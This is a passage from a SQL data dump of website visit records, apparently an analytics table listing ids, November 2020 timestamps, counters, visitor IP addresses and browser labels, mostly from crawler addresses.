,(545208,1604480223,1,1,0,0,'66.220.149.18','other'),(545209,1604480602,1,1,0,0,'31.13.127.113','other'),(545210,1604480625,1,1,0,0,'173.252.95.20','other'),(545211,1604480771,1,1,0,0,'173.252.127.19','other'),(545212,1604481201,1,1,0,0,'66.220.149.15','other'),(545213,1604481230,1,1,0,0,'94.153.15.164','chrome'),(545214,1604481535,1,1,0,0,'173.252.95.18','other'),(545215,1604481945,1,1,0,0,'31.13.127.1','other'),(545216,1604482165,1,1,0,0,'173.252.95.20','other'),(545217,1604482358,1,1,0,0,'173.252.95.25','other'),(545218,1604482520,1,1,0,0,'173.252.95.4','other'),(545219,1604482859,1,1,0,0,'173.252.95.119','other'),(545220,1604483398,2,2,0,0,'173.252.95.19','other'),(545221,1604483535,1,1,0,0,'173.252.95.1','other'),(545222,1604484212,1,1,0,0,'31.13.127.12','other'),(545223,1604484413,1,1,0,0,'69.171.251.9','other'),(545224,1604484431,1,1,0,0,'66.220.149.20','other'),(545225,1604484597,1,1,0,0,'66.220.149.34','other'),(545226,1604484608,1,1,0,0,'31.13.115.119','other'),(545227,1604484630,1,1,0,0,'173.252.95.15','other'),(545228,1604484658,1,1,0,0,'173.252.95.9','other'),(545229,1604484751,1,1,0,0,'46.211.40.138','chrome'),(545230,1604485100,1,1,0,0,'173.252.95.22','other'),(545231,1604485343,1,1,0,0,'66.220.149.14','other'),(545232,1604485350,1,1,0,0,'31.13.127.117','other'),(545233,1604485413,1,1,0,0,'173.252.127.116','other'),(545234,1604485414,1,1,0,0,'66.220.149.16','other'),(545235,1604485474,1,1,0,0,'31.13.127.5','other'),(545236,1604485475,1,1,0,0,'69.171.251.13','other'),(545237,1604485694,1,1,0,0,'69.171.251.4','other'),(545238,1604486152,1,1,0,0,'173.252.95.113','other'),(545239,1604486192,1,1,0,0,'31.13.127.120','other'),(545240,1604486801,1,1,0,0,'173.252.95.15','other'),(545241,1604487356,1,1,0,0,'31.13.127.18','other'),(545242,1604487362,1,1,0,0,'173.252.95.4','other'),(545243,1604487685,1,1,0,0,'69.171.251.3','other'),(545244,1604487701,1,1,0,0,'66.220.149.21','other'),(545245,1604487823,1,1,0,0,'173.252.127.21','other'),(545246,1604487832,1,1,0,0,'66.220.149.119','other'),(545247,1604488042,1,1,0,0,'31.13.127.24','other'),(545248,1604488750,1,1,0,0,'173.252.83.4','other'),(545251,1604488751,1,1,0,0,'173.252.83.18','other'),(545259,1604489114,1,1,0,0,'31.13.127.6','other'),(545260,1604489225,1,1,0,0,'173.252.95.24','other'),(545261,1604489270,1,1,0,0,'31.13.127.18','other'),(545262,1604489502,1,1,0,0,'173.252.95.8','other'),(545263,1604489686,1,1,0,0,'91.196.178.30','chrome'),(545264,1604490023,1,1,0,0,'69.171.251.24','other'),(545265,1604490123,1,1,0,0,'31.13.127.8','other'),(545266,1604490202,1,1,0,0,'173.252.95.119','other'),(545267,1604490327,1,1,0,0,'173.252.127.10','other'),(545268,1604490665,1,1,0,0,'69.171.251.113','other'),(545269,1604490672,1,1,0,0,'66.220.149.26','other'),(545270,1604490896,1,1,0,0,'173.252.95.113','other'),(545271,1604490913,1,1,0,0,'31.13.127.1','other'),(545272,1604491118,1,1,0,0,'69.171.251.23','other'),(545273,1604491134,1,1,0,0,'91.196.178.124','chrome'),(545274,1604491315,1,1,0,0,'66.220.149.28','other'),(545275,1604491405,1,1,0,0,'69.171.251.9','other'),(545276,1604491639,1,1,0,0,'78.111.190.68','chrome'),(545277,1604491735,1,1,0,0,'173.252.95.20','other'),(545278,1604492118,1,1,0,0,'66.220.149.118','other'),(545279,1604492239,1,1,0,0,'31.13.127.21','other'),(545280,1604492240,1,1,0,0,'173.252.95.19','other'),(545281,1604492577,1,1,0,0,'69.171.251.27','other'),(545282,1604492610,1,1,0,0,'173.252.95.13','other'),(545283,1604493020,1,1,0,0,'173.252.95.15','other'),(545284,1604493144,1,1,0,0,'31.13.127.1','other'),(545285,1604493370,1,1,0,0,'66.220.149.35','other'),(545286,1604493657,1,1,0,0,'173.252.95.2','other'),(545287,1604493792,1,1,0,0,'66.220.149.7','other'),(545288,1604493799,1,1,0,0,'31.13.127.18','other'),(545289,1604493813,1,1,0,0,'31.13.127.116','other'),(545290,1604493878,1,1,0,0,'173.252.95.24','other'),(545291,1604493887,1,1,0,0,'31.13.127.9','other'),(545292,1604493888,1,1,0,0,'31.13.127.6','other'),(545296,1604493957,1,1,0,0,'69.171.251.1','other'),(545297,1604494339,1,1,0,0,'31.13.127.20','other'),(545298,1604494606,1,1,0,0,'173.252.95.7','other'),(545299,1604494704,1,1,0,0,'31.13.127.111','other'),(545300,1604495964,1,1,0,0,'173.252.95.118','other'),(545301,1604496064,1,1,0,0,'69.171.251.11','other'),(545302,1604496218,1,1,0,0,'46.201.134.239','chrome'),(545303,1604496250,1,1,0,0,'69.171.251.10','other'),(545304,1604496640,1,1,0,0,'173.252.95.1','other'),(545305,1604496719,1,1,0,0,'31.13.127.19','other'),(545306,1604496824,1,1,0,0,'69.171.251.24','other'),(545307,1604497019,1,1,0,0,'94.153.14.99','other'),(545308,1604497083,1,1,0,0,'173.252.95.13','other'),(545309,1604497294,1,1,0,0,'173.252.95.4','other'),(545310,1604497665,1,1,0,0,'173.252.95.19','other'),(545311,1604497686,1,1,0,0,'31.13.127.12','other'),(545312,1604497717,1,1,0,0,'195.10.210.49','chrome'),(545313,1604497998,1,1,0,0,'173.252.95.24','other'),(545314,1604498175,1,1,0,0,'173.252.127.15','other'),(545315,1604498200,1,1,0,0,'173.252.95.12','other'),(545316,1604498201,1,1,0,0,'173.252.95.6','other'),(545318,1604498301,1,1,0,0,'31.13.127.17','other'),(545319,1604498387,1,1,0,0,'31.13.127.23','other'),(545320,1604498612,1,1,0,0,'173.252.95.20','other'),(545321,1604498820,1,1,0,0,'31.13.115.1','other'),(545322,1604499403,1,1,0,0,'66.220.149.26','other'),(545323,1604499442,2,2,0,0,'31.13.127.19','other'),(545325,1604499711,1,1,0,0,'69.171.251.17','other'),(545326,1604500804,1,1,0,0,'69.171.251.19','other'),(545327,1604500878,1,1,0,0,'66.220.149.15','other'),(545328,1604501211,1,1,0,0,'31.13.115.14','other'),(545329,1604501420,1,1,0,0,'173.252.127.23','other'),(545330,1604501632,1,1,0,0,'66.220.149.7','other'),(545331,1604501988,1,1,0,0,'173.252.95.116','other'),(545332,1604501997,1,1,0,0,'31.13.127.3','other'),(545333,1604502079,1,1,0,0,'69.171.251.14','other'),(545334,1604502105,1,1,0,0,'173.252.95.24','other'),(545335,1604502172,1,1,0,0,'31.13.127.20','other'),(545336,1604502182,1,1,0,0,'94.153.66.127','chrome'),(545337,1604503644,1,1,0,0,'91.196.178.69','chrome'),(545338,1604503707,1,1,0,0,'69.171.251.118','other'),(545340,1604503709,1,1,0,0,'46.211.65.170','chrome'),(545341,1604503731,1,1,0,0,'31.13.127.10','other'),(545342,1604503906,1,1,0,0,'173.252.95.18','other'),(545343,1604504365,1,1,0,0,'31.13.127.8','other'),(545344,1604504448,1,1,0,0,'173.252.127.14','other'),(545345,1604504803,1,1,0,0,'66.220.149.33','other'),(545346,1604505066,1,1,0,0,'69.171.251.10','other'),(545347,1604505080,1,1,0,0,'31.13.127.10','other'),(545348,1604505352,1,1,0,0,'173.252.95.5','other'),(545349,1604505391,1,1,0,0,'173.252.95.9','other'),(545350,1604505743,1,1,0,0,'173.252.95.4','other'),(545351,1604506131,1,1,0,0,'31.13.127.21','other'),(545352,1604506280,2,2,0,0,'173.252.95.10','other'),(545353,1604506320,1,1,0,0,'91.196.178.30','chrome'),(545354,1604506321,1,1,0,0,'66.220.149.2','other'),(545355,1604506327,1,1,0,0,'69.171.251.31','other'),(545356,1604506477,1,1,0,0,'31.13.115.11','other'),(545357,1604506790,1,1,0,0,'88.155.148.58','chrome'),(545358,1604506815,1,1,0,0,'173.252.95.29','other'),(545359,1604506872,1,1,0,0,'31.13.127.10','other'),(545361,1604506957,1,1,0,0,'69.171.251.116','other'),(545362,1604507534,1,1,0,0,'69.171.251.4','other'),(545363,1604507921,1,1,0,0,'91.196.178.30','chrome'),(545364,1604508376,1,1,0,0,'173.252.95.7','other'),(545365,1604508400,1,1,0,0,'31.13.127.19','other'),(545366,1604508401,1,1,0,0,'31.13.127.118','other'),(545367,1604508879,1,1,0,0,'173.252.95.2','other'),(545368,1604509193,1,1,0,0,'66.220.149.14','other'),(545369,1604509213,1,1,0,0,'173.252.127.35','other'),(545370,1604509503,1,1,0,0,'173.252.95.23','other'),(545371,1604510080,1,1,0,0,'173.252.95.119','other'),(545372,1604510140,1,1,0,0,'173.252.111.21','other'),(545373,1604510158,1,1,0,0,'173.252.127.14','other'),(545374,1604510414,1,1,0,0,'173.252.95.11','other'),(545375,1604510441,1,1,0,0,'69.171.251.16','other'),(545376,1604510614,1,1,0,0,'31.13.127.116','other'),(545377,1604510732,1,1,0,0,'69.171.251.31','other'),(545378,1604510781,1,1,0,0,'66.220.149.35','other'),(545379,1604510783,1,1,0,0,'173.252.95.13','other'),(545380,1604511060,1,1,0,0,'173.252.95.19','other'),(545381,1604511208,1,1,0,0,'173.252.95.26','other'),(545382,1604511422,1,1,0,0,'31.13.127.18','other'),(545383,1604511444,1,1,0,0,'94.153.76.86','chrome'),(545384,1604511448,1,1,0,0,'173.252.95.3','other'),(545385,1604511465,1,1,0,0,'31.13.127.15','other'),(545386,1604511580,1,1,0,0,'173.252.95.17','other'),(545387,1604512169,1,1,0,0,'173.252.95.8','other'),(545388,1604512310,1,1,0,0,'173.252.95.13','other'),(545389,1604512465,1,1,0,0,'66.220.149.32','other'),(545390,1604513022,1,1,0,0,'173.252.95.17','other'),(545391,1604513102,1,1,0,0,'173.252.95.118','other'),(545392,1604513160,1,1,0,0,'31.13.127.10','other'),(545393,1604513161,1,1,0,0,'69.171.251.3','other'),(545394,1604513174,1,1,0,0,'66.220.149.11','other'),(545395,1604513276,1,1,0,0,'31.13.127.1','other'),(545396,1604513653,1,1,0,0,'173.252.127.15','other'),(545397,1604513788,1,1,0,0,'66.220.149.29','other'),(545398,1604513897,1,1,0,0,'31.13.127.20','other'),(545399,1604514035,1,1,0,0,'185.237.217.5','chrome'),(545400,1604514126,1,1,0,0,'173.252.95.120','other'),(545401,1604514302,1,1,0,0,'173.252.95.5','other'),(545402,1604514609,1,1,0,0,'31.13.127.11','other'),(545403,1604515339,1,1,0,0,'31.13.127.21','other'),(545404,1604515360,1,1,0,0,'173.252.95.29','other'),(545405,1604515465,1,1,0,0,'173.252.95.1','other'),(545406,1604515863,1,1,0,0,'173.252.127.24','other'),(545407,1604515986,1,1,0,0,'173.252.95.28','other'),(545408,1604516002,1,1,0,0,'173.252.95.117','other'),(545409,1604516037,1,1,0,0,'31.13.127.18','other'),(545410,1604516047,1,1,0,0,'88.155.93.122','chrome'),(545411,1604516146,1,1,0,0,'91.196.178.45','chrome'),(545412,1604516396,1,1,0,0,'31.13.127.13','other'),(545413,1604516415,1,1,0,0,'31.13.103.16','other'),(545414,1604516899,1,1,0,0,'173.252.95.8','other'),(545415,1604517007,1,1,0,0,'31.13.127.14','other'),(545416,1604517193,1,1,0,0,'31.13.115.9','other'),(545417,1604517241,1,1,0,0,'173.252.95.3','other'),(545418,1604517387,1,1,0,0,'173.252.95.11','other'),(545419,1604517432,1,1,0,0,'173.252.95.118','other'),(545420,1604518177,1,1,0,0,'31.13.127.5','other'),(545421,1604518355,1,1,0,0,'173.252.111.17','other'),(545422,1604518379,1,1,0,0,'69.171.251.26','other'),(545423,1604518407,1,1,0,0,'66.220.149.35','other'),(545424,1604518408,1,1,0,0,'173.252.95.118','other'),(545425,1604518960,1,1,0,0,'173.252.127.6','other'),(545426,1604519049,1,1,0,0,'66.220.149.7','other'),(545427,1604519219,1,1,0,0,'173.252.95.111','other'),(545428,1604519285,1,1,0,0,'173.252.95.27','other'),(545429,1604519308,1,1,0,0,'31.13.127.4','other'),(545430,1604519459,1,1,0,0,'173.252.95.28','other'),(545431,1604519962,1,1,0,0,'66.220.149.16','other'),(545432,1604520278,1,1,0,0,'173.252.95.5','other'),(545433,1604520322,1,1,0,0,'173.252.95.118','other'),(545434,1604520357,1,1,0,0,'173.252.95.4','other'),(545435,1604520376,1,1,0,0,'31.13.127.21','other'),(545436,1604520400,1,1,0,0,'173.252.127.7','other'),(545437,1604520609,1,1,0,0,'173.252.95.113','other'),(545438,1604521069,1,1,0,0,'173.252.127.116','other'),(545439,1604521082,1,1,0,0,'91.196.178.30','chrome'),(545440,1604521495,1,1,0,0,'31.13.127.19','other'),(545441,1604521506,1,1,0,0,'173.252.95.27','other'),(545442,1604522167,1,1,0,0,'195.10.210.70','chrome'),(545443,1604522475,1,1,0,0,'31.13.127.111','other'),(545444,1604522510,1,1,0,0,'173.252.127.26','other'),(545445,1604522534,1,1,0,0,'173.252.111.22','other'),(545446,1604522535,1,1,0,0,'173.252.111.17','other'),(545447,1604523364,1,1,0,0,'66.220.149.6','other'),(545448,1604523415,1,1,0,0,'31.13.127.16','other'),(545449,1604523911,1,1,0,0,'46.211.77.106','chrome'),(545450,1604524075,1,1,0,0,'31.13.127.10','other'),(545451,1604524123,1,1,0,0,'173.252.95.26','other'),(545452,1604524288,1,1,0,0,'31.13.127.111','other'),(545453,1604525342,1,1,0,0,'173.252.111.2','other'),(545454,1604525350,1,1,0,0,'173.252.95.112','other'),(545455,1604525417,1,1,0,0,'31.13.127.4','other'),(545456,1604525525,1,1,0,0,'173.252.95.5','other'),(545457,1604525552,1,1,0,0,'173.252.95.18','other'),(545458,1604526046,1,1,0,0,'31.13.127.14','other'),(545459,1604526090,1,1,0,0,'69.171.251.3','other'),(545460,1604526842,1,1,0,0,'66.220.149.14','other'),(545461,1604526845,1,1,0,0,'31.13.127.16','other'),(545462,1604527720,1,1,0,0,'31.13.127.5','other'),(545463,1604528485,1,1,0,0,'173.252.95.119','other'),(545464,1604530485,1,1,0,0,'173.252.95.26','other'),(545465,1604530512,1,1,0,0,'31.13.127.116','other'),(545466,1604531573,1,1,0,0,'69.171.251.120','other'),(545467,1604531881,1,1,0,0,'31.13.127.118','other'),(545468,1604540399,1,1,0,0,'31.13.103.23','other'),(545469,1604542824,1,1,0,0,'31.13.103.8','other'),(545470,1604542825,1,1,0,0,'173.252.95.113','other'),(545471,1604544584,1,1,0,0,'69.171.251.2','other'),(545472,1604546193,1,1,0,0,'173.252.95.113','other'),(545473,1604547835,1,1,0,0,'31.13.127.4','other'),(545474,1604549414,1,1,0,0,'194.44.41.70','chrome'),(545475,1604549788,1,1,0,0,'31.13.103.24','other'),(545476,1604550980,1,1,0,0,'173.252.95.120','other'),(545477,1604551785,1,1,0,0,'69.171.251.17','other'),(545478,1604552190,1,1,0,0,'173.252.95.18','other'),(545479,1604552481,1,1,0,0,'31.13.103.16','other'),(545480,1604553452,1,1,0,0,'66.220.149.4','other'),(545481,1604553453,1,1,0,0,'69.171.251.13','other'),(545482,1604553945,1,1,0,0,'69.171.251.2','other'),(545483,1604556341,1,1,0,0,'173.252.95.119','other'),(545484,1604556551,1,1,0,0,'173.252.95.117','other'),(545485,1604556579,1,1,0,0,'66.220.149.31','other'),(545486,1604556594,1,1,0,0,'185.237.217.17','chrome'),(545487,1604556718,1,1,0,0,'31.13.127.23','other'),(545488,1604558055,1,1,0,0,'173.252.95.4','other'),(545489,1604558159,1,1,0,0,'31.13.127.120','other'),(545490,1604558355,1,1,0,0,'31.13.115.116','other'),(545491,1604558938,1,1,0,0,'31.13.127.21','other'),(545492,1604559754,1,1,0,0,'173.252.95.120','other'),(545493,1604559992,1,1,0,0,'31.13.127.22','other'),(545494,1604560357,1,1,0,0,'31.13.127.19','other'),(545495,1604560884,1,1,0,0,'66.220.149.33','other'),(545496,1604561349,1,1,0,0,'31.13.127.23','other'),(545497,1604561734,1,1,0,0,'173.252.95.4','other'),(545498,1604562820,1,1,0,0,'173.252.111.9','other'),(545499,1604562823,1,1,0,0,'31.13.115.23','other'),(545500,1604562877,1,1,0,0,'66.220.149.118','other'),(545501,1604563122,1,1,0,0,'173.252.111.120','other'),(545502,1604564292,1,1,0,0,'69.171.251.118','other'),(545503,1604564768,1,1,0,0,'178.133.137.217','chrome'),(545504,1604566512,1,1,0,0,'173.252.95.20','other'),(545505,1604567390,1,1,0,0,'31.13.127.118','other'),(545506,1604568129,1,1,0,0,'173.252.95.15','other'),(545507,1604568859,1,1,0,0,'31.13.127.2','other'),(545508,1604569641,1,1,0,0,'173.252.95.117','other'),(545509,1604569858,1,1,0,0,'31.13.127.113','other'),(545510,1604570915,1,1,0,0,'91.196.178.30','chrome'),(545511,1604571130,1,1,0,0,'31.13.127.16','other'),(545512,1604572235,1,1,0,0,'31.13.127.6','other'),(545513,1604572688,1,1,0,0,'173.252.95.11','other'),(545514,1604573030,1,1,0,0,'173.252.95.3','other'),(545515,1604573031,1,1,0,0,'173.252.79.20','other'),(545516,1604573032,1,1,0,0,'173.252.79.8','other'),(545517,1604573065,1,1,0,0,'94.153.24.199','chrome'),(545518,1604573573,1,1,0,0,'173.252.95.117','other'),(545519,1604574270,1,1,0,0,'173.252.127.13','other'),(545520,1604575721,1,1,0,0,'66.220.149.25','other'),(545521,1604575980,1,1,0,0,'173.252.95.111','other'),(545522,1604576292,1,1,0,0,'31.13.127.117','other'),(545523,1604576452,1,1,0,0,'66.220.149.23','other'),(545524,1604576960,1,1,0,0,'31.13.127.22','other'),(545525,1604578083,1,1,0,0,'31.13.103.23','other'),(545526,1604578167,1,1,0,0,'31.13.127.20','other'),(545527,1604578170,1,1,0,0,'173.252.95.24','other'),(545528,1604579380,1,1,0,0,'31.13.127.5','other'),(545529,1604580525,1,1,0,0,'173.252.95.14','other'),(545530,1604581131,1,1,0,0,'31.13.127.117','other'),(545531,1604581297,1,1,0,0,'173.252.95.17','other'),(545532,1604582213,1,1,0,0,'94.153.1.127','chrome'),(545533,1604582324,1,1,0,0,'31.13.127.24','other'),(545534,1604582951,1,1,0,0,'91.196.177.46','firefox'),(545535,1604583961,1,1,0,0,'31.13.127.3','other'),(545536,1604585953,1,1,0,0,'31.13.127.120','other'),(545537,1604586388,1,1,0,0,'173.252.95.25','other'),(545538,1604587148,1,1,0,0,'173.252.95.8','other'),(545539,1604587440,1,1,0,0,'31.13.127.1','other'),(545540,1604588935,1,1,0,0,'66.220.149.27','other'),(545541,1604589478,1,1,0,0,'31.13.127.10','other'),(545542,1604589805,1,1,0,0,'94.153.64.166','chrome'),(545543,1604590957,1,1,0,0,'31.13.127.24','other'),(545544,1604591513,1,1,0,0,'173.252.95.32','other'),(545545,1604591663,1,1,0,0,'31.13.127.16','other'),(545546,1604592555,1,1,0,0,'91.196.178.71','chrome'),(545547,1604592692,1,1,0,0,'31.13.127.7','other'),(545548,1604593562,1,1,0,0,'31.13.127.2','other'),(545549,1604595300,1,0,1,0,'66.249.66.92',''),(545550,1604595800,1,1,0,0,'31.13.127.6','other'),(545551,1604596127,1,1,0,0,'173.252.95.13','other'),(545552,1604596487,1,1,0,0,'66.220.149.24','other'),(545553,1604596895,1,1,0,0,'173.252.95.14','other'),(545554,1604597114,1,1,0,0,'66.220.149.19','other'),(545555,1604597413,1,1,0,0,'173.252.95.17','other'),(545556,1604597573,1,1,0,0,'173.252.95.111','other'),(545557,1604598031,1,1,0,0,'31.13.127.8','other'),(545558,1604598217,1,1,0,0,'173.252.127.2','other'),(545559,1604599698,1,1,0,0,'31.13.127.12','other'),(545560,1604599805,1,1,0,0,'173.252.95.19','other'),(545561,1604600024,1,1,0,0,'95.134.203.36','chrome'),(545562,1604600197,1,1,0,0,'173.252.127.9','other'),(545563,1604600639,1,1,0,0,'173.252.95.12','other'),(545564,1604600728,1,1,0,0,'31.13.127.1','other'),(545565,1604600837,1,1,0,0,'173.252.95.5','other'),(545566,1604601121,1,1,0,0,'173.252.95.113','other'),(545567,1604601123,1,1,0,0,'173.252.95.21','other'),(545568,1604601602,1,1,0,0,'173.252.95.16','other'),(545569,1604601752,1,1,0,0,'31.13.127.1','other'),(545570,1604601879,1,1,0,0,'173.252.95.1','other'),(545571,1604602408,1,1,0,0,'173.252.95.29','other'),(545572,1604602426,1,1,0,0,'173.252.95.19','other'),(545573,1604602761,1,1,0,0,'173.252.95.16','other'),(545574,1604603115,1,1,0,0,'173.252.95.112','other'),(545575,1604603166,1,1,0,0,'31.13.127.4','other'),(545576,1604603839,1,1,0,0,'91.196.176.13','chrome'),(545577,1604603857,1,1,0,0,'91.196.178.182','chrome'),(545578,1604604011,1,1,0,0,'173.252.111.3','other'),(545582,1604604012,1,1,0,0,'173.252.111.24','other'),(545585,1604604302,1,1,0,0,'31.13.127.19','other'),(545586,1604604522,1,1,0,0,'173.252.95.31','other'),(545587,1604604798,1,1,0,0,'173.252.95.12','other'),(545588,1604606927,1,1,0,0,'173.252.95.5','other'),(545589,1604607135,1,1,0,0,'66.220.149.26','other'),(545590,1604607996,1,1,0,0,'31.13.127.120','other'),(545591,1604608016,1,1,0,0,'31.13.115.10','other'),(545592,1604608816,1,1,0,0,'173.252.127.32','other'),(545593,1604609327,1,1,0,0,'91.196.178.30','chrome'),(545594,1604611590,1,1,0,0,'173.252.95.120','other'),(545595,1604611905,1,1,0,0,'31.13.127.15','other'),(545596,1604612121,1,1,0,0,'173.252.111.21','other'),(545597,1604612216,1,1,0,0,'173.252.95.27','other'),(545598,1604612930,1,1,0,0,'31.13.127.2','other'),(545599,1604613330,1,1,0,0,'173.252.95.28','other'),(545600,1604616160,1,1,0,0,'66.220.149.15','other'),(545601,1604619600,1,1,0,0,'31.13.127.21','other'),(545602,1604620461,1,1,0,0,'31.13.103.17','other'),(545603,1604623444,1,1,0,0,'173.252.95.117','other'),(545604,1604628955,1,1,0,0,'31.13.103.111','other'),(545605,1604630080,1,1,0,0,'66.220.149.113','other'),(545606,1604632136,1,1,0,0,'66.220.149.27','other'),(545607,1604633376,1,1,0,0,'66.220.149.15','other'),(545608,1604633980,1,1,0,0,'173.252.127.29','other'),(545609,1604634030,1,1,0,0,'69.171.251.112','other'),(545610,1604639185,1,1,0,0,'31.13.103.24','other'),(545611,1604639722,1,1,0,0,'66.220.149.30','other'),(545612,1604645988,1,1,0,0,'173.252.95.112','other'),(545613,1604648504,1,1,0,0,'173.252.95.5','other'),(545614,1604650504,1,1,0,0,'31.13.115.119','other'),(545615,1604650537,1,1,0,0,'31.13.127.16','other'),(545616,1604650890,1,1,0,0,'31.13.127.13','other'),(545617,1604651108,1,1,0,0,'66.220.149.24','other'),(545618,1604651258,1,1,0,0,'173.252.127.30','other'),(545619,1604651789,1,1,0,0,'69.171.251.6','other'),(545620,1604654161,1,1,0,0,'31.13.127.5','other'),(545621,1604654167,1,1,0,0,'173.252.95.8','other'),(545622,1604655640,1,1,0,0,'173.252.95.30','other'),(545623,1604656989,1,1,0,0,'31.13.127.13','other'),(545624,1604657080,1,1,0,0,'173.252.95.119','other'),(545625,1604658524,1,1,0,0,'104.131.178.203','other'),(545626,1604658931,1,1,0,0,'31.13.127.113','other'),(545627,1604661925,1,1,0,0,'66.220.149.30','other'),(545628,1604664565,1,1,0,0,'31.13.127.118','other'),(545630,1604665028,1,1,0,0,'173.252.95.27','other'),(545631,1604665087,1,1,0,0,'66.220.149.3','other'),(545632,1604666722,1,1,0,0,'31.13.127.19','other'),(545633,1604667236,1,1,0,0,'91.196.178.30','chrome'),(545634,1604668006,1,1,0,0,'31.13.127.21','other'),(545635,1604669910,1,1,0,0,'31.13.103.24','other'),(545636,1604670063,1,1,0,0,'173.252.95.20','other'),(545637,1604670199,1,1,0,0,'91.196.178.30','chrome'),(545638,1604670919,1,1,0,0,'173.252.95.15','other'),(545639,1604672075,1,1,0,0,'173.252.95.3','other'),(545640,1604672758,1,1,0,0,'173.252.95.39','other'),(545641,1604673013,1,1,0,0,'66.220.149.118','other'),(545642,1604674569,1,1,0,0,'31.13.115.111','other'),(545643,1604675090,1,1,0,0,'173.252.95.7','other'),(545644,1604675119,1,1,0,0,'31.13.103.10','other'),(545645,1604675802,1,1,0,0,'31.13.103.8','other'),(545646,1604676409,1,1,0,0,'91.196.178.30','chrome'),(545647,1604676431,1,1,0,0,'66.220.149.13','other'),(545648,1604676548,1,1,0,0,'173.252.95.23','other'),(545649,1604676939,1,1,0,0,'69.171.251.116','other'),(545650,1604677071,1,1,0,0,'173.252.127.13','other'),(545651,1604677606,1,1,0,0,'173.252.95.20','other'),(545652,1604677751,1,1,0,0,'31.13.127.2','other'),(545653,1604678243,1,1,0,0,'173.252.95.116','other'),(545654,1604678489,1,1,0,0,'31.13.103.20','other'),(545655,1604679418,2,2,0,0,'31.13.103.7','other'),(545656,1604679419,1,1,0,0,'31.13.103.19','other'),(545657,1604679443,1,1,0,0,'31.13.103.8','other'),(545658,1604681075,1,1,0,0,'46.211.38.202','chrome'),(545659,1604681552,1,1,0,0,'31.13.127.1','other'),(545660,1604681717,1,1,0,0,'173.252.95.24','other'),(545661,1604682095,1,1,0,0,'31.13.127.18','other'),(545662,1604682192,1,1,0,0,'91.196.178.29','chrome'),(545663,1604682252,1,1,0,0,'66.220.149.29','other'),(545664,1604682402,1,1,0,0,'31.13.127.8','other'),(545665,1604682428,1,1,0,0,'69.171.251.6','other'),(545666,1604683092,1,1,0,0,'31.13.127.112','other'),(545667,1604683093,1,1,0,0,'173.252.95.9','other'),(545668,1604683606,1,1,0,0,'91.124.118.129','chrome'),(545669,1604684208,1,1,0,0,'31.13.103.112','other'),(545670,1604684209,2,2,0,0,'31.13.103.21','other'),(545672,1604684535,1,1,0,0,'66.220.149.16','other'),(545673,1604685225,1,1,0,0,'31.13.127.118','other'),(545674,1604685383,1,0,1,0,'66.249.66.91',''),(545675,1604685598,1,1,0,0,'31.13.127.2','other'),(545676,1604685859,1,1,0,0,'31.13.115.3','other'),(545677,1604686273,1,1,0,0,'31.13.127.15','other'),(545678,1604687385,1,1,0,0,'173.252.95.25','other'),(545679,1604687453,1,1,0,0,'31.13.127.3','other'),(545680,1604687484,1,1,0,0,'173.252.95.9','other'),(545681,1604688105,1,1,0,0,'31.13.127.111','other'),(545682,1604688149,1,1,0,0,'66.220.149.32','other'),(545683,1604688556,1,1,0,0,'37.73.148.157','chrome'),(545684,1604688842,1,1,0,0,'31.13.127.7','other'),(545685,1604688859,1,1,0,0,'69.171.251.21','other'),(545686,1604689307,1,1,0,0,'31.13.127.3','other'),(545687,1604689773,1,1,0,0,'173.252.127.15','other'),(545688,1604690483,1,1,0,0,'31.13.127.11','other'),(545689,1604690488,1,1,0,0,'173.252.95.38','other'),(545690,1604693055,1,1,0,0,'66.249.66.91','chrome'),(545691,1604694262,1,1,0,0,'173.252.127.10','other'),(545692,1604695552,1,1,0,0,'31.13.127.2','other'),(545693,1604695908,1,1,0,0,'94.153.75.181','chrome'),(545694,1604695919,1,1,0,0,'173.252.95.22','other'),(545695,1604696611,1,1,0,0,'173.252.95.7','other'),(545696,1604699157,1,1,0,0,'31.13.127.11','other'),(545697,1604699165,1,1,0,0,'91.196.178.34','chrome'),(545698,1604699760,1,1,0,0,'31.13.115.13','other'),(545699,1604700190,1,1,0,0,'66.220.149.6','other'),(545700,1604700234,1,1,0,0,'31.13.127.12','other'),(545701,1604700235,1,1,0,0,'173.252.95.12','other'),(545702,1604709219,1,1,0,0,'104.131.55.155','other'),(545703,1604709906,1,1,0,0,'31.13.103.16','other'),(545704,1604711299,1,1,0,0,'31.13.103.111','other'),(545705,1604722930,1,1,0,0,'31.13.103.3','other'),(545706,1604725441,1,1,0,0,'31.13.103.118','other'),(545707,1604726228,1,1,0,0,'173.252.127.4','other'),(545708,1604726374,1,1,0,0,'195.10.210.210','chrome'),(545709,1604728459,1,1,0,0,'173.252.95.120','other'),(545710,1604730307,1,1,0,0,'173.252.95.120','other'),(545711,1604732054,1,1,0,0,'31.13.127.21','other'),(545712,1604732178,1,1,0,0,'69.171.251.10','other'),(545713,1604732246,1,1,0,0,'173.252.95.119','other'),(545714,1604732389,1,1,0,0,'66.220.149.32','other'),(545715,1604732874,1,1,0,0,'31.13.127.19','other'),(545717,1604733173,1,1,0,0,'31.13.127.112','other'),(545718,1604733310,1,1,0,0,'66.220.149.1','other'),(545719,1604734358,1,1,0,0,'173.252.95.25','other'),(545720,1604734415,2,2,0,0,'95.135.94.153','chrome'),(545721,1604734490,1,0,1,0,'66.249.66.92',''),(545722,1604740040,1,1,0,0,'46.211.8.87','chrome'),(545723,1604741279,1,1,0,0,'31.13.127.18','other'),(545724,1604742664,1,1,0,0,'31.13.127.14','other'),(545725,1604746775,1,1,0,0,'31.13.127.20','other'),(545726,1604746830,1,1,0,0,'46.211.8.87','chrome'),(545727,1604748763,1,1,0,0,'173.252.95.9','other'),(545728,1604750075,1,1,0,0,'31.13.127.24','other'),(545729,1604751860,1,1,0,0,'66.220.149.35','other'),(545730,1604755503,1,1,0,0,'31.13.127.13','other'),(545731,1604756381,1,1,0,0,'31.13.127.9','other'),(545732,1604757947,1,1,0,0,'31.13.127.17','other'),(545733,1604758083,1,1,0,0,'31.13.127.20','other'),(545734,1604761308,1,1,0,0,'31.13.127.23','other'),(545735,1604761311,1,1,0,0,'46.211.53.41','chrome'),(545736,1604764292,1,1,0,0,'31.13.127.11','other'),(545737,1604767454,1,1,0,0,'173.252.127.7','other'),(545738,1604767912,1,1,0,0,'31.13.127.1','other'),(545739,1604770090,1,1,0,0,'31.13.127.2','other'),(545740,1604773312,1,0,1,0,'66.249.66.91',''),(545741,1604773877,1,1,0,0,'31.13.127.117','other'),(545742,1604774090,1,1,0,0,'66.220.149.1','other'),(545743,1604775236,1,1,0,0,'31.13.127.3','other'),(545744,1604775245,1,1,0,0,'173.252.95.21','other'),(545745,1604776970,1,1,0,0,'31.13.127.116','other'),(